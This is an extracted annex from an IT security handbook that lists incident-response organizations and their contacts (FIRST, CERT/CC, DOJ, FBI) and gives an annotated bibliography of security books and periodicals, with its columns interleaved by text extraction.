(FIRST) Note that Federal agencies often have field (local) The Forum of Incident and Response Security Teams offices where you can get more personal contact, (FIRST) was established in March 1993. FIRST is a although not all field offices are staffed by personnel coalition that brings together a variety of computer with the same level of training as those at headquarters security incident-response teams from the public and offices. You can check your phone directory for local private sectors, as well as from universities. FIRST's numbers: look under "US Government." constituents comprise many response teams throughout the world. FIRST's goals are to: Department of Justice (DOJ) · Boost cooperation among information technology users in the effective prevention of, detection of, and 10th & Constitution Ave., NW recovery from computer security incidents Criminal Division, (Computer Crime & Intellectual · Provide a means to alert and advise clients on Property Section) potential threats and emerging incident situations John C. Keeney Building, Suite 600 · Support and promote the actions and activities of Washington, DC 20530 participating incident response teams, including +1-202-514-1026 research and operational activities http://www.cybercrime.gov · Simplify and encourage the sharing of security-related information, tools, and techniques Federal Bureau of Investigation (FBI) FIRST sponsors an annual workshop on incident response In addition to the NIPC, the FBI also runs the that includes tutorials and presentations by members of Infraguard -- a set of regional cooperative efforts response teams and law enforcement. uniting the FBI and local businesses to protect against computer crime. The Infraguard links may be found on FIRST incorporated in mid-1995 as a nonprofit entity, the NIPC WWW pages. and migrated FIRST Secretariat duties away from NIST. National Infrastructure Protection Center The Secretariat can be reached at: J. 
Edgar Hoover Building FIRST Secretariat 935 Pennsylvania Avenue, NW First.Org, Inc. Washington, D.C. 20535-0001 PMB 349 +1-202-323-3205 650 Castro Street, Suite 120 http://www.nipc.gov Mountain View, CA 94041 Email: first-sec@first.org http://www.first.org/ FIRST consists of a large number of member organizations. Check online for the most up-to-date list Information Technology Security Handbook ORGANIZATIONS 383 of members. If you have a security problem or need assistance, first attempt to determine which of these organizations most clearly covers your operations and needs. If you are unable to determine which (if any) FIRST group to approach, call any of them for a referral to the most appropriate team. Most of these response teams have a PGP key with which they sign their advisories or enable constituents to report problems in confidence: http://www.first.org/rep-info/ Most teams have arrangements to monitor their phones 24 hours a day, 7 days a week. Computer Emergency Response Team Coordination Center (CERT/CC) One particularly notable FIRST team is the CERT® Coordination Center, which serves all Internet sites. CERT grew from the computer emergency response team formed by the Advanced Research Projects Agency (ARPA) in November 1988 (in the wake of the Internet Worm and similar incidents). The CERT/CC charter is to work with the Internet community to facilitate its response to computer security events involving Internet hosts, to take proactive steps to raise the community's awareness of computer security issues, and to conduct research into improving the security of existing systems. Their WWW archive (http://www.cert.org) contains an ANNEX extensive collection of alerts about past (and current) security problems. Contact CERT at: FOUR CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA 15213-3890 +1-412-268-7090 (24 hour hotline) Email: cert@cert.org 384 PRINT RESOURCES ANNEX 5. 
Windows Security References PRINT RESOURCES Norberg, Stefan. Securing Windows NT/2000 Servers for There have been a great many books, magazines and the Internet: A Checklist for System Administrators. papers published on security in the last few years, Cambridge, MA: O'Reilly and Associates, 2002. An reflecting the growing concern with the topic. Trying to excellent hardening guide for Windows NT-based systems keep up with even a subset of this information can be that will be used to provide Internet services. quite a chore, whether you wish to stay current as a researcher or as a practitioner. Here, we have collected Anderson-Redick, Stacey. Windows System Policy Editor. information about several useful references that you can Sebastopol, CA: O'Reilly and Associates, 2000. use as a starting point for more information, further depth, and additional assistance. Other Security References We have tried to confine the list to a small set of The following books and articles are of general interest accessible and especially valuable references that you to all practitioners of computer security. will not have difficulty finding. A few of the references we have left in for historical reference as much as for Computer Crime and Law any other reason. We've provided annotation where we think it will be helpful. Freedman, David H., and Charles C. Mann. @Large; NYC, NY, 1997. A story about a huge computer crime spree If you are interested in building your security bookshelf, caused entirely by two people. This incident spawned we advise you to visit a bookstore, see the booksellers the FBI Computer Crime Squad, some FIRST teams, and at a security conference, or read the reviews of books in the writing of the Tripwire tool at Purdue. security-related venues. The field is moving quickly. Just as you keep up with bugs and patches, it is important Icove, David, Karl Seger, and William VonStorch, to maintain your currency with the literature! 
Computer Crime: A Crimefighter's Handbook, Sebastopol, CA: O'Reilly & Associates, 1995. A popular rewrite of an UNIX Security References FBI training manual; dated, but with some worthy material. These books focus on UNIX computer security. Power, Richard. Tangled Web. Indianapolis, IN, Que, Garfinkel, Simson, Gene Spafford, and Alan Schwartz. 2002. A collection of stories of cybercrime and Practical Unix and Internet Security, 3rd Edition. investigation. Cites a number of statistics to give a Cambridge, MA: O'Reilly and Associates, Inc., 2003. snapshot of the problem. Grampp, F. T., and R. H. Morris. "UNIX Operating System Computer-Related Risks Security," AT&T Bell Laboratories Technical Journal, October 1984. This is the original article on UNIX Leveson, Nancy G. Safeware: System Safety and security and remains worth reading. Computers. A Guide to Preventing Accidents and Losses Caused by Technology. Reading, MA: Addison Wesley, Wood, Patrick H., and Stephen G. Kochan. UNIX System 1995. This textbook contains a comprehensive Security, Carmel, IN: Hayden Books, 1986. A good exploration of the dangers of computer systems, and treatment of UNIX System V security prior to the explores ways in which software can be made more fault incorporation of TCP/IP networking. This book is of tolerant and safety conscious. mainly historical interest. Information Technology Security Handbook PRINT RESOURCES 385 Neumann, Peter G. Computer Related Risks. Reading, MA: Hinsley, F.H., and Alan Stripp. Code Breakers: The Inside Addison & Wesley, 1995. Dr. Neumann moderates the Story of Bletchley Park. Oxford, England: Oxford Internet RISKS mailing list. This book is a collection of University Press, 1993. the most important stories passed over the mailing list since its creation. Hoffman, Lance J. Building in Big Brother: The Cryptographic Policy Debate. New York, NY: Springer- Computer Viruses and Programmed Threats Verlag, 1995. 
An interesting collection of papers and articles about the Clipper Chip, Digital Telephony Communications of the ACM, Volume 32, Number 6, June legislation, and public policy on encryption. Of some 1989 (the entire issue). This whole issue was devoted to historical interest. issues surrounding the Internet Worm incident. Kahn, David. The Codebreakers. New York, NY: Macmillan Ferbrache, David. The Pathology of Computer Viruses. Company, 1972. The definitive history of cryptography London, England: Springer- Verlag, 1992. This was prior to the invention of public key. probably the best all-around book on the technical aspects of computer viruses, although it doesn't cover Schneier, Bruce. Applied Cryptography: Protocols, macro viruses. Algorithms, and Source Code in C. Second edition. New York, NY: John Wiley & Sons, 1996. The most Denning, Peter J. Computers Under Attack: Intruders, comprehensive, unclassified book about computer Worms and Viruses. Reading, MA: ACM Press/Addison- encryption and data-privacy techniques ever published. Wesley, 1990. A comprehensive collection of readings related to these topics, including reprints of many Singh, Simon. The Code Book: The Science of Secrecy classic articles. Historical interest. from Ancient Egypt to Quantum Cryptography. NY: Anchor Books, 2000. A very readable and up-to-date treatment Hoffman, Lance J., Rogue Programs: Viruses, Worms and of the history and principles of cryptography. Trojan Horses. New York, NY: Van Nostrand Reinhold, 1990. A comprehensive collection of readings on Wayner, Peter. Disappearing Cryptography; Boston, MA: viruses, worms, and the like. More historical interest. Academic Press, 1996. Good coverage of steganography. The Virus Bulletin. Virus Bulletin CTD. Oxon, England. An Cryptography Papers and Other Publications international publication on computer virus prevention and removal. This is an outstanding publication about Association for Computing Machinery. 
"Codes, Keys, and computer viruses and virus prevention. It is likely to be Conflicts: Issues in U.S. Crypto Policy." Report of a of value only to sites with a significant PC population, Special Panel of the ACM U.S. Public Policy Committee however. The publication also sponsors conferences that location: USACM, June 1994. (URL: http://info.acm.org/ have good papers on viruses. http://www.virusbtn.com. reports/acm_crypto_study. html) Cryptography Books Diffie, Whitfield. "The First Ten Years of Public-Key Cryptography." Proceedings of the IEEE 76 (1988): Denning, Dorothy E. R. Cryptography and Data Security. 560­76. Whitfield Diffie's tour-de-force history of public Reading, MA: Addison-Wesley, 1983. The classic textbook key cryptography, with revealing commentaries. ANNEX in the field. Now out of print but worth having. Diffie, Whitfield, and M.E. Hellman. "New Directions in Garfinkel, Simson. PGP: Pretty Good Privacy. Sebastopol, Cryptography." IEEE Transactions on Information Theory FIVE CA: O'Reilly & Associates, 1994. Describes the history of IT-22 (1976). The article that introduced the concept of cryptography, the history of the program PGP, and public key cryptography explains the PGP's use. 386 PRINT RESOURCES Lai, Xuejia. "On the Design and Security of Block Computers & Security. This is a journal published eight Ciphers." ETH Series in Information Processing 1 (1992). times each year by Elsevier Press, Oxford, England. The article describing the IDEA cipher. (Order from Elsevier Press, +44-(0) 865-512242.) It is one of the main journals in the field. This journal is LaMacchia, Brian A. and Andrew M. Odlyzko. priced for institutional subscriptions, not individuals. "Computation of Discrete Logarithms in Prime Fields." Each issue contains pointers to dozens of other Designs, Codes, and Cryptography. (1991):, 46­62. publications and organizations that might be of interest, as well as referenced articles, practicums, and Lenstra, A.K., H. W. 
Lenstra, Jr., M.S. Manasse, and J.M. correspondence. The URL for the WWW page is included Pollard. "The Number Field Sieve." Proceedings of the in "Security Periodicals." 22nd ACM Symposium on the Theory of Computing. Baltimore MD: ACM Press, 1990, 564­72. Gasser, Morrie. Building a Secure Computer System. New York, NY: Van Nostrand Reinhold, 1988. A solid Merkle, Ralph. "Secure Communication Over Insecure introduction to issues of secure system design. Most of Channels." Communications of the ACM 21 (1978): the principles still aren't followed in modern systems 294­99 (submitted in 1975). The article that should (unfortunately). have introduced the concept of public key cryptography. Gollmann, Dieter. Computer Security; Chichester, UK, Merkle, Ralph, and Martin E. Hellman. "On the Security John Wiley & Sons, 1999. A good survey textbook, of Multiple Encryption." Communications of the ACM 24 widely used in academic settings. (1981): 465­67. Hunt, A. E., S. Bosworth, and D. B. Hoyt, eds. Computer Merkle, Ralph, and Martin E. Hellman. "Hiding Security Handbook, 3rd edition. New York, NY: Wiley, Information and Signatures in Trap Door Knapsacks." 1995. A massive and thorough collection of essays on IEEE Transactions on Information Theory 24 (1978): all aspects of computer security. 525­30. Pfleeger, Charles P and Shari Lawrence Pfleeger. Security Rivest, Ron, A. Shamir, and L. Adleman. "A Method for in Computing. Englewood Cliffs, NJ: Prentice-Hall, 3rd Obtaining Digital Signatures and Public Key edition, 2002. Another good introduction to computer Cryptosystems." Communications of the ACM 21 (1978). security. General Computer Security Russell, Deborah, and G. T. Gangemi, Sr. Computer Security Basics. Sebastopol, CA: O'Reilly & Associates, Amoroso, Edward. Fundamentals of Computer Security 1991. An excellent introduction to many areas of Technology. Englewood Cliffs, NJ: Prentice-Hall, 1994. 
A computer security and a summary of government very readable and complete introduction to computer security requirements and issues. security at the level of a college text. Schneier, B. Secrets and Lies: Digital Security in a Anderson, Ross. Security Engineering; NYC, NY: John Networked World. New York: John Wiley & Sons, 2000. Wiley & Sons, 2001. A comprehensive book on end-to- end system design with security in mind. Thompson, Ken. "Reflections on Trusting Trust" Communications of the ACM, Volume 27, Number 8, Bace, Rebecca. Intrusion Detection; Indianapolis, IN: August (1984). This is a "must-read" for anyone seeking Macmillan, 2000. An excellent book on the history and to understand the limits of computer security and trust. structure of intrusion detection systems for hosts and networks. Information Technology Security Handbook PRINT RESOURCES 387 Viega, John and Gary McGraw. Building Secure Software; Kaufman, Charles, Radia Perlman, and Mike Speciner. Indianapolis, IN: Pearson/ Addison-Wesley, 2002. An Network Security: Private Communications in a Public excellent book about how to code secure software, and World. Englewood Cliffs, NJ: Prentice-Hall, 2nd edition, the pitfalls of haphazard coding and deployment. 2002. Wood, Charles Cresson, et al. Computer Security: A Stallings, William. Cryptography and Network Security: Comprehensive Controls Checklist, New York, NY: John Principles and Practices. Englewood Cliffs, NJ: Prentice Wiley & Sons, 1987. Contains many comprehensive and Hall, 2003. A good introductory textbook. detailed checklists for assessing the state of your own computer security and operations. Out of print, but a Security Products and Services Information valuable reference if you can find one used. Computer Security Buyer's Guide. Computer Security Network Technology and Security Institute, San Francisco, CA. (Order from CSI, 415-905- 2626.) Contains a comprehensive list of computer Cheswick, Bill, Steve Bellovin, and Aviel Rubin. 
Firewalls security hardware devices and software systems that are and Internet Security: Repelling the Wily Hacker, Second commercially available. The guide is free with Edition. Reading, MA: Addison-Wesley, 2003. The second membership in the Institute. The URL is at edition of the classic book on firewalls. This book will http://www.gocsi.com. teach you almost everything you need to know about how firewalls work. The first edition text is largely Understanding the Computer Security available online for free, as well, at "Culture" http://www.wilyhacker.com/1e/. All of these describe views of the future and computer Chapman, D. Brent, and Elizabeth D. Zwicky. Building networks that are much discussed (and emulated) by Internet Firewalls. Sebastopol, CA: O'Reilly & Associates, system crackers. 2nd edition, 2000. A great how-to book that describes in clear detail how to build your own firewall. Brunner, John. Shockwave Rider. New York, NY: A Del Ray Book, published by Ballantine, 1975. One of the first Comer, Douglas E. Internetworking with TCP/IP. 3rd descriptions of a computer worm. Edition. Englewood Cliffs, NJ: Prentice Hall, 4th edition, 2000. A complete, readable reference that describes how Dreyfus, Suelette. Underground; Australia, Reed Books, TCP/IP networking works, including information on 1997. A book about the exploits of several Australian protocols, tuning, and applications. hackers relatively early on. Some of the story is incorrect, however, as the author failed to contact all Garfinkel, Simson. Web Security, Privacy, and Commerce, parties to verify the facts. 2nd Edition. Cambridge, MA: O'Reilly and Associates, Inc. 2002. Gibson, William. Burning Chrome, Neuromancer, Count Zero, Mona Lisa Overdrive, Virtual Light, Idoru, All Garman, Jason. Kerberos ­ The Definitive Guide. Tomorrow's Parties. New York, NY: Bantam Books Cyber- Cambridge, MA: O'Reilly and Associates, Inc, 2003. 
punk books by the science fiction author who coined Provides full coverage of Kerberos in Windows 2000 and the term "cyberspace." ANNEX Unix environments. Hafner, Katie and John Markoff, Cyberpunk: Outlaws and Hunt, Craig. TCP/IP Network Administration. Sebastopol, Hackers on the Computer Frontier. New York, NY: Simon FIVE CA: O'Reilly & Associates, 3rd edition, 2002. This book and Schuster, 1991. Tells the stories of three hackers-- is an excellent system administrator's overview of Kevin Mitrick, Pengo, and Robert T. Morris. TCP/IP networking (with a focus on UNIX systems), and a very useful reference to major UNIX networking Levy, Steven. Hackers: Heroes of the Computer services and tools such as BIND and send-mail. Revolution. New York, NY: Dell Books, 1984. One of the original publications describing the "hacker ethic." 388 PRINT RESOURCES Littman, Jonathan, The Fugitive Game: Online with Kevin UNIX System Administration Mitnick. Boston, MA: Little, Brown, 1996. A year prior to his capture in 1995, Jonathan Littman had extensive Albitz, Paul and Cricket Liu. DNS and BIND. Sebastopol, telephone conversations with Kevin Mitnick and learned CA: O'Reilly & Associates, 4th edition, 2001. An what it is like to be a computer hacker on the run. This excellent reference for setting up DNS nameservers. is the story. Bolsky, Morris I., and David G. Korn. The New Kornshell Shimomura, Tsutomu, with John Markoff. Takedown: The Command and Programming Language. Englewood Cliffs, Pursuit and Capture of Kevin Mitnick, America's Most NJ: Prentice-Hall, 2nd edition, 1995. This is a complete Wanted Computer Outlaw--By the Man Who Did It. New tutorial and reference to the ksh--the only shell some York, NY: Hyperion, 1995. On Christmas Day, 1994, an of us use when given the choice, and the inspiration for attacker broke into Tsutomu Shimomura's computer. A the POSIX shell standard used by bash and others. 
few weeks later, Shimomura was asked to help out with a series of break-ins at two major Internet service Kernighan, Brian, Dennis Ritchie and Rob Pike. The UNIX providers in the San Fransisco area. Eventually, the trail Programming Environment. Englewood Cliffs, NJ: led to North Carolina, where Shimomura participated in Prentice-Hall, 1984. A nice guide to the UNIX the tracking and capture of Kevin Mitnick. This is the philosophy and how to build shell scripts and command story, written by Shimomura and Markoff. Markoff is the environments under UNIX. journalist with The New York Times who covered the capture. Nemeth, Evi, Garth Snyder, Scott Seebass, and Trent R. Hein. UNIX System Administration Handbook. 3rd Edition. Sterling, Bruce. The Hacker Crackdown: Law and Disorder Englewood Cliffs, NJ: Prentice-Hall, 2000. An excellent on the Electronic Frontier. This book is available in reference on the various ins and outs of running a UNIX several places on the WWW; http://www-swiss.ai. system. This book includes information on system mit.edu/~bal/ sterling/contents.html is one location; configuration, adding and deleting users, running other locations can be found in the COAST hot-list. accounting, performing backups, configuring networks, running sendmail, and much more. Highly recommended. Stoll, Cliff. The Cuckoo's Egg, Garden City, NY: Doubleday, 1989. An amusing and gripping account of tracing a Welsh, Matt, Kaufman, Lar, Dalheimer, Matthias K., and computer intruder through the networks. The intruder Dawson, Terry. Running Linux (4th edition). Sebastopol, was later found to be working for the KGB and trying to CA: O'Reilly & Associates, 2002. steal sensitive information from U. S. systems. Wall, Larry, Christiansen, Tom, and Orwant, Jon. Varley, John. "Press" Enter. Reprinted in several Programming perl (3rd edition), Sebastopol, CA: O'Reilly collections of science fiction, including Blue & Associates, 2000. 
The definitive reference to the Perl Champagne, Ace Books, 1986; Isaac Asimov's Science scripting language. A must for anyone who does much Fiction Magazine, 1984; and Tor SF Doubles, October, Tor shell, awk, or sed programming or would like to quickly Books, 1990. write some applications in UNIX. Vinge, Vernor. True Names and Other Dangers. New York, NY: Baen, distributed by Simon & Schuster, 1987. Information Technology Security Handbook PRINT RESOURCES 389 Windows System Administration Disaster Recovery Journal O'Reilly and Associates has a series of helpful books on PO Box 510110 Windows system administration, including Windows NT St. Louis, MO 63151 TCP/IP Network Administration (Craig Hunt and Robert +1 314-894-0276 Bruce Thompson, 1998), Managing the Windows 2000 Registry (Robichaux, 2000), DHCP for Windows 2000 http://www.drj.com (Neall Alcott, 2001), DNS on Windows 2000, 2nd Edition (Matt Larson and Cricket Liu, 2001), Windows 2000 InfoSecurity News Administration in a Nutshell (Mitch Tulloch, 2001), and Windows Server 2003 in a Nutshell (Mitch Tulloch, 2003). West Coast Publishing, Inc. 161 Worcester Road, Suite 201 Security Periodicals Framingham, MA 01701 Computer Audit Update http://www.scmagazine.com Computer Fraud & Security Update Computer Law & Security Report Information Security Computers & Security 85 Astor Ave, Suite 2 Elsevier Advanced Technology Norwood, MA 02062 Crown House, Linton Rd. Barking, Essex I611 8JU http://www.infosecuritymag.com England Voice: +44-81-5945942 Fax: +44-81-5945942 Telex: 896950 APPSCI G North American Distributor: P.O. Box 882 New York, NY 10159 Voice: +1-212-989-5800 http://www.elsevier.nl/catalogue/ Computer Security Alert Computer Security Journal Computer Security Buyers Guide Computer Security Institute 600 Harrison Street San Francisco, CA 94107 ANNEX Voice: +1-415-905-2626 http://www.gocsi.com FIVE